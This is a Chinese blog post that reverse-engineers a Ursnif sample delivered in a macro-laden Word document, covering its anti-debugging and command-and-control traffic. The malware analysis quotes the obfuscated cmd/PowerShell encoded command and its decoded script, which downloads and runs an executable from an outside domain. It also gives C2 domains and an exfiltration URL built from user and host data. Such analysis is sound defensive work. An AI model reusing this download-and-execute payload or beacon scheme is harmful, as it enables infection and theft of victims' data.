ursnif分析

最新推荐文章于 2022-05-10 01:26:46 发布
最新推荐文章于 2022-05-10 01:26:46 发布
阅读量638 收藏
点赞数
分类专栏: 样本分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39268483/article/details/108327464
版权

ursnif

文章目录

基本信息

样本名称5f894602e88263e34dcdbb2eb2da3078.doc
样本类型doc
恶意类型蠕虫远控
MD5cc7ceb281d0780a1514f99a635ca35e4
SHA2563122695bb31fa85dc8ff21b6f5f2ded5a1f306ea2520edafd44a653b2d277eef

主要执行流程

程序启动doc宏读取AlternativeText隐藏的负载后启动powershell执行代码,下载文件并用ShellBrowserWindow启动下载的文件。

exe启动对数据段解码,运行数据段代码,数据段代码再解码PE代码,其中触发大量访问异常来进行反调试,隐藏恶意行为。解码后的PE代码映射shellcode

shellcode获取一些关键数据,加密成url的形式发送给CC

关键技术概览

  • 联网行为

利用com组件启动IE来发送数据,启动exe也借助了com组件

  • 异常反调试

加入了VEH向量,触发异常,干扰调试。

  • 流量混淆

混入了一些正常的流量

详细分析

doc

宏代码加了混淆,调试代码

在这里插入图片描述

得到GetObject("new:0006F03A-0000-0000-C000-000000000046").CreateObject("Wscript.Shell").Run! fJjbjrHVMN,CInt(0)

此CLSID与outlook有关

InlineShape.AlternativeText隐藏了负载

cmd命令行用Debug.print打印出来为

cmD.exe /c P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsAIAAgAA0ACgANAAoAIAAgAGkAZgAoACQAbQAuAE4AYQBtAGUAIAAtAGUAcQAgACIARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAIgApAHsADQAKACAAIAAgACAAIAB0AHIAeQB7AA0ACgAgACAAIAAgACAAJAB1AHIAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAoACIAaAB0AHQAcAA6AC8ALwBzAGUAYQB1AGoAMwA1AHkAdwBzAGcALgBjAG8AbQAvADIAcABvAGUAZgAxAC8AagAuAHAAaABwAD8AbAA9AHoAZQBwAGEAeAA2AC4AZgBnAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIA BbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABsAEsAQwBGAFoALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAI AAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAA0ACgB9AA0ACgANAAoARQB4AGkAdAA7AA0ACgANAAoA

其中powershell命令行base64解密一下

$instance = [System.Activator]::CreateInstance("System.Net.WebClient");

$method = [System.Net.WebClient].GetMethods();

foreach($m in $method){  

if($m.Name -eq "DownloadData"){try{$uri = New-Object System.Uri("http://seauj35ywsg.com/2poef1/j.php?l=zepax6.fgs")$response = $m.Invoke($instance, ($uri));$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\\\lKCFZ.exe";

[System.IO.File]::WriteAllBytes($path, $response);
$clsid = New-Object Guid \'C08AFD90-F2A1-11D1-8455-00A0C91F3880\'
$type = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
$object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)
}catch{}
}
}
Exit;

ShellBrowserWindow启动下载的文件

exe

网络连接

利用COM组件构成一个进程外Internet Explorer对象的实例

https://www.fireeye.com/blog/threat-research/2010/08/reversing-malware-command-control-sockets.html

在这里插入图片描述

CLSID

在这里插入图片描述

IID

在这里插入图片描述

调用了IwebBrowser接口的Navigate方法

获取到一些域名

c58fdzlitzy.band

sa75robb.company

hkelleyae52.city

在这里插入图片描述

再用火绒监控一下,发现其有Http请求不过连接已经失效,且其中包含了一些正常流量躲避检测

在这里插入图片描述

动态调试

将.data段变成可读可写可执行,进行解码,解码算法大致如下,三组

初始密钥为E70FCE1D

在这里插入图片描述

翻译成伪C

int key=0xE70FCE1D
for(int i=0;i<0x956;i++)
{
    if(i&3==0)
    {
      key=key&0xffff0000+((key&0xffff)*2)&0xffff;
      ror(key,3)//循环左移3位
    }
    data_encode[i]=^(char)key;
    ror(key,8)
}

GetCurrentProcessID

OpenProcess//

又对PE各个区段重新进行了解码,如果有下断点,程序就会触发异常,且调试时尽量F7单步调试
在这里插入图片描述

程序注册了VEH,且利用VirtualProtect修改属性触发了大量的访问冲突异常,进行反调试,VEH修改代码段属性且向代码段写入了数据,写入的数据为调用的API那些

在这里插入图片描述

在这里插入图片描述

调用GetModuleHanle时仍触发异常,需要将写入内存修改可读可写权限

创建内存镜像,句柄为0x90,创建

在这里插入图片描述

起始地址为0x500000,后经确认为shellcode

打开ntdll

在这里插入图片描述

读取导出表地址,LdrLoadDll LdrGetProcedureAddress

在这里插入图片描述

GetUserNameW

函数调用方式

call edi
LdrLoadDll
LdrGetProcedureAddress
jmp eax

GetComputerNameW

cpuid获取系统信息

0x522643

IE10RunOnceLastShown_TIMESTAMP发现字符串

在这里插入图片描述

soft=3&version=214071&user=d25f522aee878f97ea41ac1bbdb9aaa7&server=12&id=3261&crc=1&uptime=28121

将数据进行一系列异或运算之后,再进行base64编码,base64编码会将/替换为_2f +替换为 _2b得到的值随机插入’/'最后加上.avi前面补上域名和image

c58fdzlitzy.band/images/K_2Ferq85SD4wdyo/nPzb86ReUIgCMzq/bvAOE0gcOldJuu3tvq/GNOMZw8I0/Ntc43EVpiVoWeAKpau4X/emftHc8IkMLHDB_2+zO/xYun84veMNifPS4yKsJFXi/HbSgy0a4QhWRq/ad5_2+rD/8e05uC9AXiwTdkn/z.avi

利用com组件navigate将其发送给cc

在这里插入图片描述

cc由于没有响应,程序结束

playmak3r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过注册表设置IE首页
wzwjr的专栏
04-21 1423
最近公司在搞ERP项目培训,服务器地址是改了又改,生产部门的业务员又不会改,整的我是啊 每台电脑都要去设置一下首页地址,后头实在太痛苦了,弄了个注册表修改的文件,直接执行一下就OK了。将如下内容复制在记事本中另存为reg文件即可。执行前最好先备份自己的注册表,因为如下的参数是我自己电脑里导出来的,可能会对你的IE的设置带来不便:Windows Registry Editor Version 5.00[HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer
nginx伪静态(超级简单)
热门推荐
醉世老翁的博客
08-31 11万+
由于只是学习伪静态就自己配个host随便玩了,也没多写配置文件,注意是伪静态 上面的一条伪静态(rewrite)是将访问wojiuwangla.com/wangla.html给301(重定向)到百度。 首先配置host,我的电脑是win10的,host文件在C:\Windows\System32\drivers\etc\hosts 访问结果 访问域名,正常返回,然后访问伪...
wireshark 导出二进制文件_使用 Wireshark 完整分析最新的Ursnif恶意软件
weixin_39623411的博客
12-12 693
Ursnif是一种银行恶意软件,有时也称为Gozi或IFSB ,Ursnif恶意软件家族已经活跃了很多年。本文将回顾使用Wireshark捕获Ursnif流量的数据捕获(pcaps),在检测和调查Ursnif感染时,了解新的流量模式对于安全专业人员至关重要。 Ursnif分配方法Ursnif可以通过基于Web的感染链和恶意垃圾邮件(malspam)进行传播,在某些情况下,Ursn...
白话windows之四 异常处理机制(VEH、SEH、TopLevelEH...)
weixin_30760895的博客
08-26 519
原文地址:http://bbs.pediy.com/showthread.php?t=173853 今天是我侄子的4岁生日,特此更新一篇,祝我小侄子在幼儿园多泡MM我们都知道SEH异常处理机制,那VEH、TopLevelEH呢?他们执行的先后顺序是怎样的呢?当这些机制都不使用的情况下,会发生什么情况呢?异常处理器是怎么工作的?如果你对此感兴趣,那我们就一起来扒开异常处理机制的面纱吧术语:SEH:...
关于nif
好记性不如烂博客
08-19 1260
[size=x-large]一、NIF的误用问题[/size] 使用NIF是很危险的,一不小心它就会搞垮你的erlang VM,还会堵塞erlang调度器使VM进入假死状态。 平均每20个使用NIF的项目,就有19个滥用了NIF。参考:[url=http://jlouisramblings.blogspot.tw/2013/07/problematic-traits-in-erlang...
信息安全_数据安全_Finding_Treasures_in_the_ToyBox.pdf
08-22
TA544是另一个被提及的攻击组,他们常通过伪装成采购订单或账单的maldoc传播Ursnif木马,以窃取用户信息。 这些知识点强调了在当前的网络安全环境中,数据安全的重要性以及对恶意活动的持续监控和快速响应的必要性...
如何处理分布式网络中的内部威胁.pdf
08-08
7. 日志分析和威胁情报:收集和分析来自分布式网络各个节点的日志数据,结合外部威胁情报,可以发现潜在的安全威胁和攻击模式。 文档中提到的“RDP”指的是远程桌面协议,它是Windows系统中用于远程连接到其他...
powerglot:Powerglot使用polyglots对攻击性的powershell脚本进行编码。 进攻性安全工具,可用于隐秘恶意软件,特权升级,横向移动,反向攻击外壳等
03-12
最近的恶意软件和APT使用了其中一些功能:APT32,APT37,Ursnif,Powload,LightNeuron / Turla,Platinum APT,Waterbug / Turla,Lokibot,The dukes(Ghost操作),Titanium等。 Powerglot是基于多义标记的多...
VEH和VCH科普
mqzzqian的专栏
06-08 4541
本文转自梦织未来(www.mengwuji.net) 地址:http://www.mengwuji.net/forum.php?mod=viewthread&tid=1371 作者:mengwuji 很久没发帖子了,痛苦的失眠,就顺便来讲讲VEH这玩意儿。 一般,再好的程序员,也不能说自己写出的代码是没bug的、执行后不会产生异常。所以呢,好的程序员总会在可能认为会出现异常问题的那段代码加
不错的关于windows平台下用户模式调试器的原理
tiewen的专栏
04-18 2909
不错的关于windows平台下用户模式调试器的原理     所谓调试器实际上是一个很宽泛的概念,凡是能够以某种形式监控其他程序执行过程的程序,都可以泛称为调试器。在Windows平台上,根据调试器的实现原理大概可以将之分为三类:内核态调试器、用户态调试器和伪代码调试器。     内核态调试器直接工作在操作系统内核一级,在硬件与操作系统之间针对系统核心或驱动进行调试,常见的有SoftICE、Wi
浏览器调试样式伪类,比如如何看到hover 的样式
蚁族的奋斗的博客
03-15 2849
focus-within 表示如果元素里面有元素聚焦
隐藏的Excel变量是如何被用于恶意邮件攻击的?
systemino的博客
11-04 400
在过去的几个月里,FortiGuard SE团队一直在利用和增强Fortinet机器学习系统来检测新出现的威胁。最近,其中一台机器检测到一个异常的峰值,正是根据这个结果,我们发现了一个恶意软件活动,该活动在过去一段时间曾专门针对日本用户。 与大多数钓鱼活动一样,这种攻击从一封试图欺骗收件人打开附件的电子邮件开始,在本文的示例中,附件是一个恶意的Excel文档,其中含恶意宏。然而,在这次调查中,...
SafeSEH原理及绕过技术浅析
magictong的专栏
04-27 1万+
SafeSEH原理及绕过技术浅析     作者:magictong 时间:2012年3月16日星期五   摘要:主要介绍SafeSEH的基本原理和SafeSEH的绕过技术,重点在原理介绍。 关键词:SafeSEH;绕过技术;异常处理   目录 前言 SafeSEH的保护原理 (1)      二进制层面 (2)      系统层面 怎么关掉编译器的SafeSEH支持
针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析
Fly20141201. 的专栏
05-13 3718
一、事件回放 网络管理员在服务器上通过网络监控软件检测到,有程序在不断向外发,并且ip地址显示国外的区域,经过相关安全工程师的分析和定位,最确定是微软操作系统上的Power Shell程序出现异常。发现的这个Power Shell程序和微软操作系统上的Power Shell程序不同,出现异常的这个Power Shell会不断的向外发。经过该安全工程师的分析和反编译程序,最终得到了下面这段关键
Dridex样本分析
playmaker的博客
10-07 7582
Dridex分析报告 基本信息 样本名称 INV_984748.xls 样本类型 excel 恶意类型 蠕虫远控 SHA256 7F8F24884E26B4B508D5147F8F54269E452D1200904323544EF36E30400190B1 样本名称 t9ak0.dll SHA256 076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab 主要执行流程 excel打开启动
AndLua加密解密
playmaker的博客
05-10 3827
进入关键函数Lua_loader_buffer首先判断第一个字符为= 之后根据base64解码表映射解密base64,其中将第一个字符替换为0x1d,即为0x1d+0x2b=H 解码base64后的结果如下所示 如果第一个字符为0x1c进行异或解密 最后再将第一个字符0x1c替换为0x78,进行inflate解码,解码完成后将第一个字符替换为28(0x1c) 解密算法如下 import base64 import base64 import zlib fp=open("main.lua","rb")
QBOT分析
playmaker的博客
08-31 1660
QBOT分析报告 文章目录QBOT分析报告基本信息主要执行流程关键技术概览反沙箱傀儡进程DLL详细分析vbs分析新vbs分析DLL分析新exe傀儡进程参考资料 基本信息 样本名称 qakbot 样本类型 vbs 恶意类型 蠕虫远控 样本MD5 2a4a6cc8bd52f618a0190a8529c82b7d 样本SHA1 ef3d638377e245d7f388b41aad5e3525a8ccd2ed 主要执行流程 样本是一封钓鱼邮件,下载文件是一个VBS文件,VBS开启了严
ICEID
playmaker的博客
08-31 892
文章目录基本信息样本基本信息主要执行流程office宏pfsdnskdf.exe解密exe傀儡进程关键技术概览1.时间差检测2.cpuid3.隐写术4.傀儡进程5.浏览器注入6.流量混淆详细分析宏代码部分PFSDNSKDF.EXE微步云在线分析手动分析PFSDNSKDF.EXE下载解密文件分析微步云在线分析手动分析新shellcode傀儡进程火绒剑分析开启监听端口生成自签名证书对谷歌浏览器执行远线程注入手动分析其他参考链接 基本信息 样本基本信息 文件名称 fram.doc 样本类型 doc
HTTP流量与DNS隧道安全检测技术分析
- HTTP协议广泛用于各种恶意活动,如窃密、下载者和银行木马(TrickBot、Emotet、Ursnif、FormBook)。 - 异常检测主要关注以下六个方面: - 不一致:内容与Content-Type不匹配,或与返回状态不符。 - 字段异常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值